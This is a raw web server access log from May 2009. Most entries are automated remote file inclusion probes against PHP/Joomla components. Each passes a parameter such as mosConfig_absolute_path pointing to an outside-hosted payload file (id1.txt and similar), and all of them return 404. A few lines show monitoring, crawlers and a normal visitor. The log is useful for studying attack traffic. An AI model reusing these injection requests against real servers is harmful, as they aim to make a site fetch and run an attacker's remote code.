62.146.68.61 - - [31/May/2009:07:54:04 -0400] "GET /logs/access_log.Q109052100/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
112.175.141.41 - - [31/May/2009:07:54:07 -0400] "GET /logs/access_log.Q109051100%20%20//include/bbs.lib.inc.php?site_path=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:07:54:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
221.139.104.104 - - [31/May/2009:07:54:36 -0400] "GET /appserv/main.php?appserv_root=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:07:54:36 -0400] "GET /logs/access_log.Q109051800/appserv/main.php?appserv_root=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:07:54:36 -0400] "GET /logs/appserv/main.php?appserv_root=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:07:54:37 -0400] "GET /logs/access_log.Q109052200%20%20/?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:07:55:03 -0400] "GET /appserv/main.php?appserv_root=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:07:55:03 -0400] "GET /logs/appserv/main.php?appserv_root=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:07:55:03 -0400] "GET /logs/access_log.Q109051800/appserv/main.php?appserv_root=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:07:55:08 -0400] "GET /logs/access_log.Q109052200/?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
213.246.62.35 - - [31/May/2009:07:55:53 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/superscan/id.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
218.249.36.194 - - [31/May/2009:07:55:59 -0400] "GET /logs/access_log.Q109052100///components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jamur-x.do.am/id1.txt??????? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
218.249.36.194 - - [31/May/2009:07:56:04 -0400] "GET /logs/access_log.Q109051500///components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jamur-x.do.am/id1.txt??????? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
213.246.62.35 - - [31/May/2009:07:57:04 -0400] "GET //include/bbs.lib.inc.php?site_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
213.246.62.35 - - [31/May/2009:07:57:04 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
213.246.62.35 - - [31/May/2009:07:57:07 -0400] "GET /logs/access_log.Q109051100//include/bbs.lib.inc.php?site_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:07:57:48 -0400] "GET /logs/error_log.Q108052600/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:07:58:41 -0400] "GET /logs/access_log.Q109051800%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:07:59:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.8.108 - - [31/May/2009:07:59:27 -0400] "GET /logs/error_log.Q109022500 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.165.73.157 - - [31/May/2009:08:00:22 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.165.73.157 - - [31/May/2009:08:00:22 -0400] "GET /logs/access_log.Q109052100//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.165.73.157 - - [31/May/2009:08:00:22 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.165.73.157 - - [31/May/2009:08:00:22 -0400] "GET /logs/access_log.Q109052100//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.165.73.157 - - [31/May/2009:08:00:22 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
121.165.73.157 - - [31/May/2009:08:00:22 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
121.165.73.157 - - [31/May/2009:08:00:27 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.165.73.157 - - [31/May/2009:08:00:28 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.246.62.35 - - [31/May/2009:08:01:06 -0400] "GET /logs/error_log.Q108082300/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/superscan/id.txt? HTTP/1.1" 404 268 "-" "libwww-perl/5.803"
116.36.213.166 - - [31/May/2009:08:01:41 -0400] "GET /logs/access_log.Q109051800%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
124.0.73.2 - - [31/May/2009:08:02:03 -0400] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.nw.or.kr/bbs/icon/omilaid.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
124.0.73.2 - - [31/May/2009:08:02:04 -0400] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.nw.or.kr/bbs/icon/omilaid.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
121.165.73.157 - - [31/May/2009:08:02:16 -0400] "GET /logs/access_log.Q109052100%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.165.73.157 - - [31/May/2009:08:02:17 -0400] "GET /logs/access_log.Q109050700%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.165.73.157 - - [31/May/2009:08:02:30 -0400] "GET /logs/access_log.Q109052100%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.165.73.157 - - [31/May/2009:08:02:31 -0400] "GET /logs/access_log.Q109050700%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.232.198.162 - - [31/May/2009:08:03:08 -0400] "GET /logs/access_log.Q109051800//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 290 "-" "libwww-perl/5.810"
72.232.198.162 - - [31/May/2009:08:03:14 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.810"
72.232.198.162 - - [31/May/2009:08:03:19 -0400] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.810"
209.59.12.99 - - [31/May/2009:08:04:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.246.62.35 - - [31/May/2009:08:04:20 -0400] "GET //include.php?path[docroot]=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
213.246.62.35 - - [31/May/2009:08:04:20 -0400] "GET /logs//include.php?path[docroot]=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
213.246.62.35 - - [31/May/2009:08:04:20 -0400] "GET /logs/access_log.Q109051800//include.php?path[docroot]=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:08:04:24 -0400] "GET /logs/access_log.Q109050900//modules/vwar/admin/admin.php?vwar_root=http://www.curling-erfurt.de/media/id.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.808"
217.147.29.190 - - [31/May/2009:08:04:24 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.curling-erfurt.de/media/id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.808"
217.147.29.190 - - [31/May/2009:08:04:24 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.curling-erfurt.de/media/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.808"
217.147.29.190 - - [31/May/2009:08:04:59 -0400] "GET /logs/error_log.Q109050900//modules/vwar/admin/admin.php?vwar_root=http://www.curling-erfurt.de/media/id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.808"
218.246.20.221 - - [31/May/2009:08:05:09 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
72.232.198.162 - - [31/May/2009:08:06:46 -0400] "GET /logs/access_log.Q109051800//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 290 "-" "libwww-perl/5.810"
72.232.198.162 - - [31/May/2009:08:06:51 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.810"
72.232.198.162 - - [31/May/2009:08:06:56 -0400] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.810"
112.175.141.41 - - [31/May/2009:08:07:29 -0400] "GET /logs/access_log.Q108112300%20%20//include/bbs.lib.inc.php?site_path=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
38.99.13.118 - - [31/May/2009:08:09:10 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
209.59.12.99 - - [31/May/2009:08:09:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.206.183.148 - - [31/May/2009:08:13:18 -0400] "GET /logs/access_log.Q109021500/errors.php?error=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.823"
91.206.183.148 - - [31/May/2009:08:13:19 -0400] "GET /errors.php?error=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.823"
91.206.183.148 - - [31/May/2009:08:13:19 -0400] "GET /logs/errors.php?error=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.823"
91.206.183.148 - - [31/May/2009:08:13:58 -0400] "GET /logs/access_log.Q109052100/errors.php?error=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.823"
213.246.62.35 - - [31/May/2009:08:14:51 -0400] "GET /logs//include.php?path[docroot]=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
213.246.62.35 - - [31/May/2009:08:14:51 -0400] "GET //include.php?path[docroot]=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:08:15:12 -0400] "GET /logs/error_log.Q109051000//modules/vwar/admin/admin.php?vwar_root=http://www.curling-erfurt.de/media/id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.808"
213.246.62.35 - - [31/May/2009:08:15:17 -0400] "GET //include.php?path[docroot]=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
213.246.62.35 - - [31/May/2009:08:15:17 -0400] "GET /logs//include.php?path[docroot]=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
213.246.62.35 - - [31/May/2009:08:15:17 -0400] "GET /logs/access_log.Q109051800//include.php?path[docroot]=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.206.183.148 - - [31/May/2009:08:15:59 -0400] "GET /errors.php?error=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.823"
124.0.73.2 - - [31/May/2009:08:16:02 -0400] "GET /logs/error_log.Q109051400//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.nw.or.kr/bbs/icon/omilaid.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
217.147.29.190 - - [31/May/2009:08:16:03 -0400] "GET /errors.php?error=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:08:16:03 -0400] "GET /logs/errors.php?error=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:08:16:03 -0400] "GET /logs/access_log.Q109021500/errors.php?error=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:08:16:12 -0400] "GET /logs/access_log.Q109052100/errors.php?error=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:08:16:14 -0400] "GET /errors.php?error=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:08:16:14 -0400] "GET /logs/errors.php?error=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:08:16:14 -0400] "GET /logs/access_log.Q109021500/errors.php?error=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:08:16:30 -0400] "GET /logs/access_log.Q109052100/errors.php?error=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:08:17:49 -0400] "GET /logs/access_log.Q109051800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:08:18:42 -0400] "GET /logs/access_log.Q109021500%20%20/errors.php?error=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:08:18:42 -0400] "GET /logs/access_log.Q109052100%20%20/errors.php?error=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:08:19:19 -0400] "GET /logs/access_log.Q109021500%20%20/errors.php?error=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:08:19:20 -0400] "GET /logs/access_log.Q109052100%20%20/errors.php?error=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
112.175.141.41 - - [31/May/2009:08:20:38 -0400] "GET /logs/access_log.Q109031800//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
112.175.141.41 - - [31/May/2009:08:20:44 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
112.175.141.41 - - [31/May/2009:08:20:44 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
112.175.141.41 - - [31/May/2009:08:20:46 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
112.175.141.41 - - [31/May/2009:08:20:48 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
112.175.141.41 - - [31/May/2009:08:20:48 -0400] "GET /logs/access_log.Q109031800//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:08:21:21 -0400] "GET /logs/access_log.Q109051800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
112.175.141.41 - - [31/May/2009:08:21:45 -0400] "GET /logs/access_log.Q108081500//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
112.175.141.41 - - [31/May/2009:08:21:51 -0400] "GET /logs/access_log.Q108081500//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:08:22:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
221.139.104.104 - - [31/May/2009:08:22:15 -0400] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:08:22:15 -0400] "GET /logs/access_log.Q109052200/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:08:22:15 -0400] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:08:22:22 -0400] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:08:22:22 -0400] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:08:22:22 -0400] "GET /logs/access_log.Q109052200/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
72.232.198.162 - - [31/May/2009:08:23:10 -0400] "GET /logs/access_log.Q109052100/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
72.232.198.162 - - [31/May/2009:08:23:10 -0400] "GET /errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
72.232.198.162 - - [31/May/2009:08:23:10 -0400] "GET /logs/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.810"
72.70.10.164 - - [31/May/2009:08:23:33 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; {4642E463-EA6F-4F7C-99AC-C37915BEAC29}; GTB6; .NET CLR 1.1.4322)"
72.70.10.164 - - [31/May/2009:08:23:33 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; {4642E463-EA6F-4F7C-99AC-C37915BEAC29}; GTB6; .NET CLR 1.1.4322)"
72.70.10.164 - - [31/May/2009:08:23:39 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; {4642E463-EA6F-4F7C-99AC-C37915BEAC29}; GTB6; .NET CLR 1.1.4322)"
72.70.10.164 - - [31/May/2009:08:23:39 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; {4642E463-EA6F-4F7C-99AC-C37915BEAC29}; GTB6; .NET CLR 1.1.4322)"
38.99.44.103 - - [31/May/2009:08:24:02 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
72.232.198.162 - - [31/May/2009:08:24:39 -0400] "GET /logs/access_log.Q109052100/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
72.232.198.162 - - [31/May/2009:08:24:39 -0400] "GET /errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
72.232.198.162 - - [31/May/2009:08:24:39 -0400] "GET /logs/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.810"
217.147.29.190 - - [31/May/2009:08:25:35 -0400] "GET /logs/access_log.Q109050300/errors.php?error=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:08:25:41 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.119.154.129 - - [31/May/2009:08:25:48 -0400] "GET /logs/access_log.Q109051100/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
85.119.154.129 - - [31/May/2009:08:25:48 -0400] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
85.119.154.129 - - [31/May/2009:08:25:49 -0400] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
85.119.154.129 - - [31/May/2009:08:25:52 -0400] "GET /logs/access_log.Q109051100/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
85.119.154.129 - - [31/May/2009:08:25:52 -0400] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
85.119.154.129 - - [31/May/2009:08:25:53 -0400] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
203.251.225.77 - - [31/May/2009:08:26:40 -0400] "GET /logs/access_log.Q109052100//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.mysticrystals.com/ccp5/media/fx29id1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
203.251.225.77 - - [31/May/2009:08:26:40 -0400] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.mysticrystals.com/ccp5/media/fx29id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
203.251.225.77 - - [31/May/2009:08:26:40 -0400] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.mysticrystals.com/ccp5/media/fx29id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
203.251.225.77 - - [31/May/2009:08:26:50 -0400] "GET /logs/access_log.Q109051000//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.mysticrystals.com/ccp5/media/fx29id1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:08:27:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.119.154.129 - - [31/May/2009:08:27:13 -0400] "GET /logs/error_log.Q108060700/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
85.119.154.129 - - [31/May/2009:08:27:20 -0400] "GET /logs/error_log.Q108060700/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
221.139.104.104 - - [31/May/2009:08:27:46 -0400] "GET /logs/access_log.Q109052200%20%20/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
72.232.198.162 - - [31/May/2009:08:27:48 -0400] "GET /logs/error_log.Q109051800//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 289 "-" "libwww-perl/5.810"
